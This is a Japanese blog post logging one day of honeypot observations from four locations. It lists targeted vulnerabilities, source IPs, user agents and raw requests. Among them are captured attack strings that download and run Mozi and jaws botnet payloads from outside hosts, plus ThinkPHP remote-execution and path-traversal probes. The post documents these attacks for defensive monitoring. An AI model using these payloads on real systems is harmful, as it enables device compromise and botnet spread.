コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/10/07 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/10/07分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

aiohttpによるスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws
Location:US

Spring Bootの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 193[.]23[.]161[.]113/jaws;
sh /tmp/jaws
Location:UK

Spring Bootの脆弱性を狙うアクセス
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:SG

JBoss脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2019-2725)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 193[.]23[.]161[.]113/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:93 (前日比:+26)
US:総アクセス数:81 (前日比:+5)
UK:総アクセス数:43 (前日比:-75)
SG:総アクセス数:193 (前日比:+124)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.117.84.161 China
3 3.80.113.106 United States
1 20.38.175.131 United States
1 24.239.89.217 United States
2 34.64.156.29 United States
2 34.75.193.102 United States
1 34.86.35.31 United States
1 34.223.53.78 United States
1 40.71.19.205 United States
1 41.142.90.195 Morocco
1 45.88.107.26 Netherlands
23 45.146.164.110 Russia
1 58.248.193.202 China
2 64.227.13.201 United States
1 78.128.112.14 Bulgaria
18 89.163.190.203 Germany
6 107.189.6.44 United States
1 109.23.68.217 France
1 125.127.153.1 China
2 137.184.109.135 United States
4 137.184.109.194 United States
1 138.199.14.142 United Kingdom
1 147.135.115.235 United States
1 147.182.246.150 United States
1 164.90.184.159 United States
1 172.104.138.223 United States
1 183.136.225.9 China
1 183.188.223.43 China
1 192.241.208.103 United States
3 198.98.54.17 United States
1 199.19.225.172 United States
1 209.17.96.114 United States
5 209.141.56.212 United States
1 209.141.62.185 United States

UserAgent一覧

件数 UserAgent
8 -
2 Hello, world
1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36
23 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
9 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 zgrab/0.x
1 Python/3.7 aiohttp/3.7.4.post0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
3 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
1 \xaf
21 GET /.env HTTP/1.1
1 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?q=%letterure%&va=b&t=hc&ia=web HTTP/1.0
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
7 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fuN3 HTTP/1.0
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
9 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 23.129.64.154 United States
2 23.148.145.38 United States
2 31.7.63.42 Panama
2 34.88.40.239 United States
1 34.217.177.180 United States
1 34.222.26.91 United States
1 34.222.121.245 United States
1 35.203.118.150 United States
23 45.146.164.110 Russia
1 54.202.64.49 United States
1 78.128.112.14 Bulgaria
3 87.251.64.138 Russia
1 89.187.179.56 Czechia
8 107.189.6.44 United States
2 112.213.126.247 Hong Kong
1 115.48.182.10 China
1 117.223.92.124 India
1 120.85.174.78 China
1 128.14.209.162 United States
4 135.125.217.54 France
1 147.182.246.118 United States
1 147.182.246.150 United States
1 156.219.123.51 Egypt
1 182.124.193.142 China
3 185.53.90.24 Belize
1 185.254.31.134 Turkey
1 192.241.197.177 United States
1 192.241.203.68 United States
1 192.241.203.131 United States
1 194.127.179.60 United Kingdom
1 198.98.54.17 United States
2 199.19.225.172 United States
1 199.195.253.71 United States
1 209.17.96.186 United States
4 209.141.56.212 United States
2 209.141.62.185 United States

UserAgent一覧

件数 UserAgent
11 -
3 Go-http-client/1.1
2 Hello, World
1 Hello, world
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; PPC Mac OS X 10.10; rv:54.0) Gecko/20100101 Firefox/54.0
1 Mozilla/5.0 (Macintosh; PPC Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
23 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
10 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
8 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
3 Mozilla/5.0 zgrab/0.x
2 Python-urllib/3.9

リクエスト内容一覧

件数 Method Request Protocol
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
4 \x03
2 \x16\x03\x01
1 CONNECT www[.]google[.]com:443 HTTP/1.1
10 GET /.env HTTP/1.1
1 GET /.hg HTTP/1.1
1 GET /.svn HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?q=%peridiniidae%&va=b&t=hc&ia=web HTTP/1.0
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
8 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /mysql/mysqlmanager/index.php HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
2 GET /pmd/index.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+193[.]23[.]161[.]113/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/ HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/ HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
10 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
2 31.7.63.42 Panama
1 34.65.8.99 United States
2 34.89.197.209 United States
1 34.96.130.27 United States
12 45.146.164.110 Russia
1 78.128.112.14 Bulgaria
3 107.189.6.44 United States
1 139.162.145.250 Netherlands
1 162.62.117.51 Singapore
3 185.53.90.24 Belize
1 192.241.197.147 United States
1 192.241.200.117 United States
1 192.241.209.207 United States
4 198.98.54.17 United States
1 199.19.225.172 United States
1 206.189.195.58 United States
1 209.17.97.114 United States
4 209.141.56.212 United States
1 209.141.62.185 United States

UserAgent一覧

件数 UserAgent
8 -
3 Go-http-client/1.1
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
2 Python-urllib/3.9

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
5 \x16\x03\x01
1 GET /.env HTTP/1.1
1 GET /.hg HTTP/1.1
1 GET /.svn HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?q=%whitherward%&va=b&t=hc&ia=web HTTP/1.0
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
6 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
3 GET http[:]//azenv[.]net/ HTTP/1.1
1 OPTIONS / RTSP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 23.129.64.196 United States
1 23.236.174.163 Canada
2 34.87.219.242 United States
4 40.122.167.171 United States
1 45.144.225.84 Netherlands
12 45.146.164.110 Russia
1 51.81.139.82 United States
1 61.53.45.20 China
1 66.249.77.79 United States
1 78.128.112.14 Bulgaria
101 84.53.66.158 Netherlands
1 103.28.70.137 United States
7 107.189.6.44 United States
1 134.119.189.158 Germany
3 135.125.217.54 France
1 159.89.167.112 United States
3 163.172.168.251 United Kingdom
1 163.179.161.143 China
2 185.53.90.24 Belize
25 185.128.41.50 Panama
1 186.33.110.115 Dominican Republic
1 192.241.196.91 United States
1 192.241.197.87 United States
1 192.241.204.240 United States
1 194.127.179.60 United Kingdom
1 197.61.128.132 Egypt
2 199.19.225.172 United States
3 200.37.200.189 Peru
5 209.141.56.212 United States
3 212.47.244.68 France
1 212.64.58.209 China
1 213.183.63.34 Lithuania
1 216.229.91.171 United States
1 223.246.149.77 China

UserAgent一覧

件数 UserAgent
10 -
2 Hello, World
1 Hello, world
12 Java/1.8.0_131
4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.104
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36
2 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
12 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1 Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)
3 Mozilla/5.0 zgrab/0.x
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
3 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
2 CONNECT www[.]bing[.]com:443 HTTP/1.1
15 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?q=%spiraculiform%&va=b&t=hc&ia=web HTTP/1.0
1 GET /_async/AsyncResponseService HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /cgi-bin HTTP/1.1
7 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
2 GET /manager/html HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
1 GET /public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1]=phpinfo() HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+193[.]23[.]161[.]113/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /index HTTP/1.1
1 POST /index.action HTTP/1.1
1 POST /index.do HTTP/1.1
1 POST /index.jsp HTTP/1.1
4 POST /invoker/readonly HTTP/1.1
1 POST /login HTTP/1.1
1 POST /login.action HTTP/1.1
1 POST /login.do HTTP/1.1
1 POST /login.jsp HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//geraldinemarquez[.]website/00a9e4255a5b63067b76cbfb9fd67f26bdb91be802d5ffcb177ec1b7a8d4c623bf2f45b469ae442c1354d7719588be4a40c6edfb36649722318e23e962b434cbfc48b6f96dd167e4dd5a5df710928d4584dbb686595bf9ef45bc7227d23e5cc6 HTTP/1.1
1 POST http[:]//veroniquemaker[.]fun/4b231c1523080da64931a9509d8e1762f96c9e01350593b0ae9918ff6f1569d935471c3756a83c84f5b5381d73c7813ad6cff1a7655ed91a0c46891ae51511b65f145c74cba80465f0de7145920b1d6e352c65f3d125c41c5517b121753fe227 HTTP/1.1